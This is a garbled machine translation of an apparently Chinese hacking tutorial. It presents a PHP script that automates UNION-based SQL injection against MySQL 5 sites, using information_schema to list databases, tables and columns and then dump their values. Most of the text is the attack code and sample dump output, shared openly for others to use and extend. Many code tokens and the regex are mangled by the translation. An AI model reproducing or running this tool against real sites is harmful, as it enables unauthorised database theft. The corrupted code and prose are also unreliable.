Php+mysql 5 SQL Injection Burst tool beta version _php tutorial

Article author: Mika from: Evil octal

MySQL out of the 5 version, the injection of the vulnerability is more easy to use than before, but also can be like MSSQL directly burst (even more easily than MSSQL, because the MSSQL burst is required to open the wrong prompt, if the error is closed, it is necessary to solve the problem of violence, and MySQL as long as you find the injection point as long as the Union can be any one field can be displayed on the page can be. Since reading FLYH4T's article "Mysql5 Injection Skills Summary" has been wanted to test, the results I found a lot of stations have been updated to this version, so the test is not easy to call ~ ~ ~ ~ ~ ~ to save strength, nature is the use of their own knowledge to write a simple tool automatic storm, compared to manual to be more convenient. I think there will be a lot of friends need such tools, although I found on the internet including the latest pangolin, but the test results are not satisfactory. or write your own to use it handy. In fact, the code is not technical, but in the spirit of sharing, is to provide a tool for everyone, people do not laugh at me oh
The tool is written by PHP (because I think it is convenient to write), the code is as follows:
Error_reporting (7);
echo "Mysql ver 5 SQL injection exploitercoded by mika[est]";
if ($ARGC >7 | | $argc <2)
{
Echo << <>
Usage: $argv [0]-t [table] [-F- C [condition]]
INFO;
Die
}
//****************************************************************************
$url = "http://www.vul.com/display_msg.php?id=432%20and%201=2%20union%20select%201,2,3,4,5,MIKA_MIKA,7,8";
$db _name= "Vuldb";
//****************************************************************************
$curl =curl_init ();
curl_setopt ($curl, curlopt_header,0);
curl_setopt ($curl, curlopt_returntransfer,1);
curl_setopt ($curl, Curlopt_proxy, "127.0.0.1:8080");

function Find_value ($url) {
Global $curl;
echo $url. "";
curl_setopt ($curl, Curlopt_url, $url);
$content =curl_exec ($curl);
Echo $content;
$re =preg_match ("/(| | |). +?||) /i ", $content, $result);
Echo $content;
if ($re)
{
Return Str_replace (| |,, $result [1]);
return $result [1];
}
return 0;
}

function Str2ascii ($STR) {
$temp = "char (";
for ($i =0; $i<>
echo $str [$i]. "";
$temp. =ord ($str [$i]).,;
}
$temp. =ord ($str [Strlen ($STR)-1]).);
echo $temp. "";
return $temp;
}

function exploit_db () {
Global $url, $curl;
$new _url=str_replace (Mika_mika,concat (0x7c7c,schema_name,0x7c7c), $url);
$new _url.= "%20from%20information_schema. schemata%20limit%20mika_mika,1/* ";
$i = 0;
echo "DATABASES:";
do{
$new =str_replace (Mika_mika, $i, $new _url);
if ($v 1=find_value ($new))
echo $v 1. "";
$i + +;
}while ($v 1);
}

function Exploit_tab () {
Global $url, $db _name, $curl;
$new _url=str_replace (Mika_mika,concat (0x7c7c,table_name,0x7c7c), $url);
$new _url.= "%20from%20information_schema. Tables%20where%20table_schema= ". Str2ascii ($db _name). %20limit%20mika_mika,1/* ";
echo "Tables of Database". Strtoupper ($db _name). ":";
$i = 0;
do{
$new =str_replace (Mika_mika, $i, $new _url);
if ($v 1=find_value ($new))
echo $v 1. "";
$i + +;
}while ($v 1);
}

function Exploit_field () {
Global $table _name, $url, $curl;
$new _url=str_replace (Mika_mika,concat (0x7c7c,column_name,0x7c7c), $url);
$new _url.= "%20from%20information_schema. Columns%20where%20table_name= ". Str2ascii ($table _name). %20limit%20mika_mika,1/* ";
$i = 0;
echo "Columns of Table". Strtoupper ($table _name). ":";
do{
$new =str_replace (Mika_mika, $i, $new _url);
if ($v 1=find_value ($new))
echo $v 1. "";
$i + +;
}while ($v 1);
}

Function Exploit_value ($mode =0) {
Global $db _name, $table _name, $field _name, $condition, $url, $curl;
$new _url=str_replace (Mika_mika,concat (0x7c7c,mika_mika,0x7c7c), $url);
if ($mode)
{
$new _url.= "%20from%20$db_name. $table _name%20where%20$condition/*";
$new =str_replace (Mika_mika, $field _name, $new _url);
$v 1=find_value ($new);
Echo $v 1. "";
return;
}
$new _url.= "%20from%20$db_name. $table _name%20limit%20mika_num,1/*";
$new _url=str_replace (Mika_mika, $field _name, $new _url);
$i = 0;
echo "$field _name values of table". Strtoupper ($table _name). ":";
do{
$new =str_replace (Mika_num, $i, $new _url);
if ($v 1=find_value ($new))
Echo $v 1. "";
$i + +;
}while ($v 1);
}

Switch ($ARGC) {
Case 2:
if ($argv [1]==-t)
Exploit_tab ();
if ($argv [1]==-d)
exploit_db ();
Break
Case 3:
$table _name= $argv [2];
Exploit_field ();
Break
Case 5:
Case 6:
$table _name= $argv [2];
$field _name= $argv [4];
Exploit_value ();
Break
Case 7:
$table _name= $argv [2];
$field _name= $argv [4];
$condition = $argv [6];
Exploit_value (1);
Break
}

?>
The code is very simple, and I saved a lot of force, just a very rough version, exactly how convenient how to come. But enough to satisfy the burst field value, let me explain briefly:
The parameter between the two//********* is required to be modified directly in the code, because it is too long and is too cumbersome to be placed under the command line, so it is better to put it directly in the code. Where the source is obviously a loophole URL, to join union, as the code is written, as follows:
HTTP://WWW.VUL.COM/DISPLAY_MSG.P ... 0union%20select%201,2,3,4,5,6,7,8
For example, the 6th number will be displayed on the page, then you will replace the number 6 with "Mika_mika", and finally not with the comment (because the program will be added automatically at the time of submission), the final URL is as follows:
$url = "http://www.vul.com/display_msg.php?id=432%20and%201=2%20union%20select%201,2,3,4,5,MIKA_MIKA,7,8";
In addition, $db_name is the database name, you can directly use the databases () function to obtain, and then fill here.

You can use it after filling it out, very simple. Open cmd, switch to the directory where the program is located, for example, to take all the database, you can use:
f:scriptsphpmine>php mysql5.php-d
Mysql ver 5 SQL injection exploiter

Coded by Mika[est]

DATABASES:
|| information_schema| |
|| vuldb| |
Fetch table Name:
f:scriptsphpmine>php mysql5.php-t
Mysql ver 5 SQL injection exploiter

Coded by Mika[est]

Tables of database Vuldb:
|| articles| |
|| audio| |
.
.
.
Omitted
.
.
.
Burst Field Name:
f:scriptsphpmine>php Mysql5.php-t Articles
Mysql ver 5 SQL injection exploiter

Coded by Mika[est]

Columns of table articles:
|| id| |
|| article_id| |
|| title| |
|| type| |
.
.
.
Omitted
.
.
.
Burst value:
f:scriptsphpmine>php mysql5.php-t articles-f Type
Mysql ver 5 SQL injection exploiter

Coded by Mika[est]

Type values of table articles:
|| 2| |
|| 1| |
.
.
.
Omitted
.
.
.
In addition you want to add your own conditions, you can at the end of the add-c parameter and then follow the where conditions to qualify (do not take where), such as:
f:scriptsphpmine>php mysql5.php-t articles-f id-c type=2
Mysql ver 5 SQL injection exploiter

Coded by Mika[est]

|| 58| |
The program is very simple, but the basic function is to have, I just think of where to write, so after what perfect must take up to share with you. There are mistakes in the code and can be improved, but also ask you to help change together. In addition, this line is in the code:
curl_setopt ($curl, Curlopt_proxy, "127.0.0.1:8080");
This is to use the proxy, if not necessary can be directly commented out.

Disclaimer: Reproduced please keep intact, in addition to really hope that we do not too stingy, with the changes have been added, but also hope to take out to share with you, although my code is not how

http://www.bkjia.com/PHPjc/509165.html www.bkjia.com true http://www.bkjia.com/PHPjc/509165.html techarticle article author: Mika from: Evil octal MySQL out of the 5 version, the injection of the vulnerability is easier than ever to take advantage of, can also be like MSSQL directly to take out (even more easily than MSSQL ...)

